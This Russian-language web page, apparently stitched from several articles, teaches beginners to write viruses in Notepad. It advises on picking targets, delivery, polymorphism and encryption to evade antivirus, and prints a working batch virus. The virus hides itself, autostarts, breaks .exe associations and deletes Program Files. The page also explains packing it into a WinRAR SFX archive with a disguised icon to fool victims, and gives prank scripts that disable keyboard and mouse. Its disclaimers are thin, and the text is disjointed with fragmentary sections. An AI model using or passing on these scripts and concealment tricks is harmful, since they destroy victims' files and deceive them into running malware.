• Главная
  •  > 
  • Questions
  •  > 
  • Создание вирусных программ. Как создать вирус в текстовом редакторе: в помощь новичкам

Создание вирусных программ. Как создать вирус в текстовом редакторе: в помощь новичкам

Найдите операционную систему, которую желаете атаковать. Чаще всего - это Microsoft Windows, в особенности старые версии. Множество пользователей не обновляют их операционные системы, оставляя их уязвимыми к современным атакам.

  • Mac OS X и Linux считаются более защищенными от вирусных атак (связано с работой прав доступа и архитектурой операционной системы). 95% всех вирусов нацелены на пользователей Windows.

Решите, как распространять вирус. Вирус будет являться вирусом, если сможет распространиться на других пользователей. Вам необходимо придумать метод доставки до того, как начнете работу над созданием вируса. Часто используемые компоненты доставки:

Найдите слабое место для атаки. Успешные вирусы используют слабые места в программах и системной безопасности, чтобы работать и распространяться. На это уходит много исследований и знаний, но существуют специализированные сообщества, которые могут с этим помочь.

Определитесь с функционалом вашего вируса. Что сделает вирус после заражения системы? Эффекты могут быть различными, начиная от нулевого эффекта, отображения сообщения, удаления файлов и другие, более вредоносные эффекты. Знайте, что создание и распространение вирусов является незаконным действием во многих странах.

Выберите язык. Чтобы создать вирус, вам необходимо хотя бы базовое понимание какого-нибудь языка программирования или скриптового инструмента. Более сложные вирусы очень часто включают несколько языков программирования. Для наиболее эффективных вирусов, вам понадобится знание ассемблера.

  • Если вы хотите создать исполняющие вирусы, то поищите курсы C и C++ в интернете.
  • Если вы хотите создать макро вирусы, то выучите язык макросов для нужной программы, например, Microsoft Office.
  • Visual Basic может быть использован для создания вредоносных программ для пользователей Windows.

  • Начните работу над вашим вирусом. На это уйдет длительное время, особенно в первый раз. Экспериментируйте как можно больше, и узнайте о способах распространения вашего кода в зависимости от используемого языка. Существуют руководства и блоги по изучению некоторых языков.

    • Узнайте о полиморфном коде. Это изменит код вашей программы после каждой реплики, скрывая вирус от антивирусных программ. Полиморфный код будет довольно продвинутым шагом, который создается различными способами в разных языках программирования.

  • Узнайте о способах спрятать ваш код. Кроме полиморфного кода, существуют способы спрятать ваш вирус. Шифрование является очень популярным инструментом среди разработчиков вирусов. На это уходит много времени и чтения, но в результате вы сможете защитить и продлить жизнь вашему вирусу.

  • Проверьте ваш вирус. Как только создадите работающий прототип, проверьте его на нескольких машинах и сборках. Самый простой способ – это использование виртуальных машин с различными сборками.

    • Постарайтесь проводить тесты в закрытой сборке так, чтобы избежать случайного попадания вашего вируса в сеть. Поставьте тестовые машины в отдельную сеть и протестируйте распространение вируса.
    • Улучшайте код вашего вируса по ходу тестирования. Работайте над ошибками вашего кода.

    • Недавно решил немного расширить свой кругозор в области безопасности и немного порылся в сети на тему простых вирусов в кустарных условиях. Оказывается вирусы можно создавать даже в простом блокноте. Информацию об этом я представляю только в ознакомительных целях. Помните писать вирусы - плохо. Вам же наверное не приятно когда ваш любимый компьютер заражают, вот и вы не поступайте так с другими.

    Писать будем bat файл в обычном виндовом блокноте. Создаем файл и пишем.

    @Echo off (запрещаем вывод на экран исполняемых команд)
    Echo Virus Loading (Выводит на экран надпись «Virus Loading» В место нее можете писать что угодно)
    Date 13.09.96 (эта строка изменяет дату)
    If exist c:ski.bat goto abc (проверяет существует ли файл, …..)
    Copy %0 c:ski.bat (копирует вирус только изменив названия)
    Attrib +h c:ski.bat (делает файлу ski.bat атрибут скрытый
    Echo c:ski.bat >>autoexec.bat (Прописывает файл ski.bat в автозагрузку
    :abc (……если он существует, то программа перейдет на метку:abc)
    md PRIDUROK
    md LUZER
    md DURAK (Создает пустые папки)
    md LAMER
    Label E: PRIDUROK (CD-ROM будет называться PRIDUROK)
    assoc .exe=.mp3 (запускает все ексшники как музыка
    del c:Program Files/q (удаляет все файлы из этой папки)
    Echo VIRUS LOAD (Выводит надпись)

    Итак мы написали простой вирус. Теперь нажимаем ФАЙЛ>>СОХРАНИТЬ КАК, и в поле имя файла пишем, например virus.bat
    .bat обязательна везде. Появился значок MS-DOS. Так что бы жертва не смогла увидеть его код будем использовать WIinRar. Берем наш вирусочек и кидаем его в архив вылетит окно и ты просто ставишь галочку «создать SFX-архив. Далее заходим в дополнительное и открываем параметры SFX там есть строка выполнить после распаковки и ты пишешь РЕАЛЬНОЕ имя твоего вируса. Видишь простой блокнот вступил как вирусосаздатель, а WinRar сделал якобы программу….выводы делать тебе. И смотри непопадись сам на это. Не принимай файлы в инете от незнакомых людей и смотри на размер файла.

    Reg - непосредственная работа с реестром. Смотреть reg /? всем!
    rcp - обмен файлами через rcp в ascii
    runas - от имени пользователя
    tasklist - отображает приложения и сеансы, связанные с ним.
    taskkill - позволяет завершить один или несколько процессов
    tftp - trivial ftp
    tskill - убить процесс
    reg - утилита взаимодействия с реестром
    bootcfg - настройка boot.ini
    append - позволяет открывать удаленные файлы так, словно они находятся в текущем.
    getmac - получить мас
    logoff - Заверщить пользовательский сеанс.
    mem - вывод на экран сведений о текущих процессах в ОЗУ
    mqbkup - архивирование
    netsh - ??
    openfiles - просмотреть открытые файлы.
    rsh - выполнение команд на удаленных узлах с запущеной rsh
    sc - command line ??
    rexec - выполнение команд на удаленных узлах с запущеной rexec
    shutdown - выключить (хе-хе) local or remote computer.
    systeminfo - вывод инфы о компе.
    schtasks - планировщик заданий.
    xcopy - копирование файлов и каталогов.
    tsshutdn - завершение работы сервера в установленом порядке.
    set - вывод, задание и удаление переменных среды cmd.exe. Свойства системы (пр.кн."мой комп") - дополнительно - Переменные среды. Там не все переменные, но много! Все смотреть просто set.
    Кстати, вот некоторые RunDLL команды, которые могут использоваться при создании батников

    Это программное обеспечение, целью создания которого является получение несанкционированного доступа к ресурсам компьютера или информации на жестком диске. Часто создается для нанесения вреда путем копирования, искажения, удаления, подмены информации. Рассмотрим далее, как создать вирус-шутку, защититься от вирусов.

    Что такое вирус

    Перед тем как создать вирус, необходимо точно определить, что это такое. Чтобы программа считалась вредоносной, она должна:

    • уничтожать информацию или нарушать работу компьютера;
    • выполняться без предупреждения;
    • иметь явную цель несанкционированного доступа или уничтожения информации.

    Компьютерные вирусы должны отвечать всем вышеназванным критериям. Например, взломщик защиты от копирования - это не вредоносная программа. Она не уничтожает файлы, а только подбирает пароль для разблокировки. Также программа для форматирования диска не может считаться вредоносной. Она уничтожает данные на компьютере, но выполняется с согласия пользователя. Если программа уничтожает информацию из-за внутренних ошибок, она тоже не считается вирусом. Хотя разработчики могут ответить за халатное отношение к работе или как нарушители прав потребителей, ведь программа могла удалить важные данные. В целом четкие критерии до сих пор не определены. Чтобы программа считалась вирусом, проводят программно-техническую экспертизу.

    Виды вирусов

    Зачем создают вирусы? Существует много причин. Одна часть вредоносных файлов действительно опасна и может навредить работоспособности машины, другая наносит вред косвенно. Список основных целей:

    1. Дестабилизация.
    2. Установка другого вредоносного ПО.
    3. Кража, мошенничество, шпионаж.
    4. Рекламное ПО.
    5. Прочее.

    Компьютерные вирусы создают помехи, это может быть беспричинное открытие и закрытие дисковода, поломка аппаратного обеспечения.

    Некоторые программы ведут себя достаточно хитро. Загрузка медиафайлов по зараженной ссылке может привести к скачиванию вредоносного ПО.

    Для кражи любой информации применяется сканирование жесткого диска, регистрация нажатия клавиш, перенаправление пользователя на поддельный сайт. Так, крадутся аккаунты и используются для рассылки спама, взламываются платежные системы, блокируются компьютеры с целью вымогания денежных средств. Это бывает платное программное обеспечение, которое после скачивания ничего полезного не делает.

    Из-за испорченного файла на компьютере может быть организован общедоступный прокси-сервер, машина станет участником ботнета и будет использоваться для проведения DDOS-атак. С популяризацией биткоина участились случаи скрытого майнинга на ПК пользователей.

    Также существуют программы, которые показывают рекламу или собирают различную информацию в маркетинговых целях.

    Как создать вирусы

    В "Блокноте" (а точнее, в любом текстовом редакторе) можно создать вредоносную программу, причем сделать это можно точно так же, как создают обычные программы. Используются любые языки программирования. Обычно, это C++, но может быть Delphi и.Net. Целью создания вируса может быть шутка или ознакомление с тем, как он работает. Простая программа пишется прямо в "Блокноте", а сам код занимает очень мало строк.

    Полностью исключить попадание вируса на компьютер можно при условии отключения интернета и отказа от использования нелегального ПО. Файлы, содержащие вирусы, могут функционировать и без подключения к интернету. В таком случае они навредят информации на жестком диске пользователя или станут причиной некорректной работы программ.

    Сегодня основной целью хакеров становится не разработка деструктивных программ, которые явно вредят работе системы, а создание продуктов, которые ведут себя тихо. Они могут работать долгое время и в один момент нанесут очень серьезный вред.

    Признаки заражения

    Перед тем, как создать вирус, злоумышленники анализируют все пути, по которым его могут обнаружить, пытаются их обойти. Антивирусы эффективно находят вредоносные файлы, но по ошибке пользователя некоторые из них могут быть добавлены в исключения. Чтобы вовремя среагировать, что компьютер заражен, нужно отслеживать подозрительные и странные действия.

    Самые очевидные признаки заражения:

    • открытие окон с незнакомым содержимым;
    • блокировка доступа к сайтам;
    • сторонние процессы в "Диспетчере задач";
    • новые записи в автозапуске;
    • невозможность внесения изменений в настройки компьютера;
    • случайный перезапуск компьютера или отключение.

    Некоторые из симптомов могут быть вызваны вирусом-шуткой и не несут явную угрозу системе. А некоторые из них используются для отвлечения внимания, в то время пока основной вирус собирает данные о пользователе.

    Распространение вирусов

    Атака имеет несколько этапов. Первый отвечает на вопрос о том, как создать вирус, то есть это технологический этап. На втором осуществляется доставка вредоносного ПО на компьютер. Основные способы распространения вирусов:

    • exploit использует уязвимости в программном обеспечении, с помощью чего захватывает контроль над системой и нарушает ее функционирование;
    • логическая бомба срабатывает при определенном условии, она неотделима от той программы-носителя, в которую интегрирована;
    • троянская программа проникает в компьютер под видом легального программного обеспечения, очень часто является частью целой спланированной многоступенчатой атаки;
    • черви самостоятельно распространяются через локальные и глобальные сети, для этого используются ошибки в администрировании, а также средства социальной инженерии.

    Профилактика и лечение

    Для защиты от вирусов существуют антивирусы. Они качественно защищают систему, но, как правило, сам пользователь виноват в заражении системы. Поэтому нужно:

    • своевременно устанавливать обновления, использовать лицензионные копии;
    • работать на компьютере под правами пользователя, а не администратора;
    • открывать компьютерные файлы только из надежных источников;
    • использовать брандмауэр.

    Как сделать вирус-шутку

    Вирус - это в первую очередь программа, которая изменяет содержимое каких-либо файлов. Она создается так же, как и любая другая программа. Самые простые варианты вредоносного ПО можно создать в "Блокноте". Для этого не нужны специальные навыки или знание языков программирования.

    Как создать вирусы в "Блокноте"?

    Следующие строки создадут 1000 папок за одну секунду, что введет юзера в ступор:

    Как создать вирус для кражи паролей? Ответить на этот вопрос уже сложнее. Для этого необходимо продумать, каким образом пользователь запустит вредоносный файл, каким образом будет осуществляться кража данных. Только потом можно приступить к реализации. Это очень сложный процесс. Кроме того, это может быть незаконно, так что не рекомендуем читателям создавать вирусы в каких-либо целях (кроме, конечно, учебных).

    Для того, чтобы понять насколько Ваш компьютер не защищен от действий злоумышленников, предлагаю создать несколько простеньких вирусов самому. Благодаря этому Вы поймете, что любой компьютер подчиняется не только нажатиям клавиш. Компьютер получив всего одну команду (нажатие на иконку файла, можно и без него), может начать самостоятельно открывать, создавать, удалять, переименовывать и т.д.
    Как правило расширение этих файлов.bat .exe - перед точкой любое придуманное имя.

    - Файл.bat создается в обычном блокноте, при сохранении используется расширение.bat, вместо.txt (по умолчанию Безымянный.txt или *.txt).
    Пример: открываем стандартный блокнот пишем mspaint - всего 7 букв, сохраняем этот файл (файл - сохранить как) не как обычно, а пишем вместо "Безымянный.txt" - myfile.bat. Естественно, вместо myfile любое удобное название.

    Если Вы выполнили вышеуказанные действия, то поздравляю: вами создан первый командный файл, который, при нажатии на него, откроет рисовальщик Paint (есть в любой Windows).

    - Файл.exe компилируется специальной программой из bat файла (не только из него) для маскировки или другой функциональности.
    Подобных программ компиляторов существует много, одну из них можете скачать ниже в комплекте с набором заготовок для экспериментов с bat файлами.
    Скриншот программы Bat Exe Converter:


    Но командные файлы могут быть и не такие безвредные, как описанный выше. Достаточно изменить его содержимое, как ваш компьютер начнет выполнять любые прописанные в нем команды.

    Приведу примеры результатов команд, которые можно назвать просто шутками над товарищем:
    - Изменить дату на компьютере, допустим 1812 год или день Вашего рождения;
    - Постоянно много раз подряд открывать Paint, Калькулятор, Ошибку...;
    - Поменять кнопки мыши местами;
    - Отключить компьютер;
    - Заставить компьютер постоянно перезагружаться;
    - Переименовать имя жесткого диска;
    - Удалить все файлы из папки в которой лежит данный файл (не дай бог, если это рабочий стол);
    И так далее, практически можно придумать любые шутки. Это зависит от изощренности мышления мстителя.

    Ниже приведены жестокие действия, на которые способен этот файл, здесь уже не до шуток:
    - Возможность самостоятельно записываться в любое место, включая флешку;
    - Иметь скрытый атрибут, быть не видимым, как и исполнение его команд;
    - Переименовать все файлы на компьютере, допустим.lnk переделать в.txt, а необходимые в работе.exe назвать.mp3. Результат: ярлыки будут открываться в блокноте, рабочие программы пытаться открыться в плеере.
    - Множественное количество раз скрыто открывать одну и ту же программу, для торможения компьютера;
    - Добавлять вирус в автозагрузку, при включении компьютера;
    - Полное удаление без возможности восстановления какой-либо программы. Обычно программы установлены по умолчанию в определенной директории и хакеру это известно...
    На этом список только начинается. Но мы остановимся, ведь этого уже предостаточно для того, чтобы компьютер перестал работать.

    Для того, чтобы описанное выше не было голословным, ниже Вы можете скачать архив.
    В нем лежит:
    - текстовый файл "Самоучитель.txt" с описанием кодов bat и приведенных живых примеров.
    - Программка для компиляции файлов в.exe
    - Изменение кнопок мыши для примера
    - Безобидные полезные готовые файлы bat:
    otkl-60.bat - отключение компьютера через 60 секунд
    otkl-60-otmena.bat - отмена отключения
    Paint.bat - включаем Paint
    Simvol.bat - открываем таблицу символов

    Скачать создание вирусов для защиты от них - Врага надо знать в лицо:

    При загрузке антивирус вашего компьютера может начать ругаться и правильно сделает.
    Будьте осторожны! После скачивания архива и его распаковки не нажимайте на файлы без изучения инструкции или данной статьи.

    Проверить содержимое файла.bat можно нажатием на него правой клавишей мыши и выбором из всплывающего меню пункта "Изменить":


    Перед экспериментами убедительно прошу Вас создать резервную точку восстановления системы.

    Надеюсь эти эксперименты убедят Вас в том, что нужно внимательнее относиться к чужеродным файлам и программам, которые открываются и устанавливаются нами на компьютер. Будьте внимательны при работе с почтой: не скачивайте и тем более не открывайте файлы, подобные нашим примерам.

    Заканчиваю на минорной ноте: Осторожно! Вирусы всюду!

    Вирусы пишут, как правило, для того, чтобы подпортить жизнь другому - "съесть" свободное место на его ПК, вывести из строя систему, "взломать" пароли и т. д. Несмотря на такие последствия, существуют вирусы, созданные, чтобы просто посмеяться над приятелем. Пишется такой вирус за пять минут, и он не вытворяет с системой ничего критического. Наиболее распространенными вирусами-шутками являются выключение ПК, многократное открытие одной и той же программы, вывод смешного текста.

    Подобные простенькие вирусы создаются в стандартном Блокноте (Notepad), разве что сохраняются не с разрешением.txt, а в формате командного файла.bat.

    Как сделать вирус

    Рассмотрим поэтапно, как написать вирус, открывающий многократно одно приложение.

    1. Открываем блокнот - для этого на рабочем столе щелкаем правой кнопкой мыши и выбираем "Создать"→"Текстовый документ".
    2. Начинаем наполнять наш вирус командами
      • @echo off //в данной строке запрещаем вывод команд
      • echo "процесс запущен" //текст, который увидит пользователь
      • start mspaint
      • goto:p //многократный запуск программы paint
      • pause //нажатие любой клавиши
      • del %0 //самоуничтожение вируса
    3. У сохраненного файла меняем значок на более популярный (браузер, word и т.д) и прописываем соответствующее имя.

    Ещё несколько возможных розыгрышей:

    Некое подобие заставки фильма "матрица"

    • @echo off
    • color 2
    • echo 1185585851851891704148 1185585851851891704148
    • echo 1185585851851891704148 1185585851851891704148
    • echo 1185585851851891704148 1185585851851891704148
    • echo 1185585851851891704148 1185585851851891704148
    • echo 1185585851851891704148 1185585851851891704148
    • echo 1185585851851891704148 1185585851851891704148
    • echo 1185585851851891704148 1185585851851891704148
    • goto:a
    • pause

    Смена работы кнопок мыши

    • %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

    Смена времени

    • time 0:00

    Отключение клавиатуры

    • rundll32 keyboard,disable

    Отключение мыши

    • rundll32 mouse,disable

    Мы рассмотрели самые простые и безобидные способы, как напакостить приятелю. В действительности, изучив системные команды, можно безвозвратно "положить" систему на чужом компьютере (да и на своем по неосторожности).

    О существовании разных видов вирусов вы можете также узнать из статьи , но углубляться в данную тему не стоит, чтобы не создавать себе и другим лишних проблем. Лучше позаботиться о защите собственного компьютера и поставить надежную антивирусную программу, дабы самому не попасться на розыгрыш друга или врага.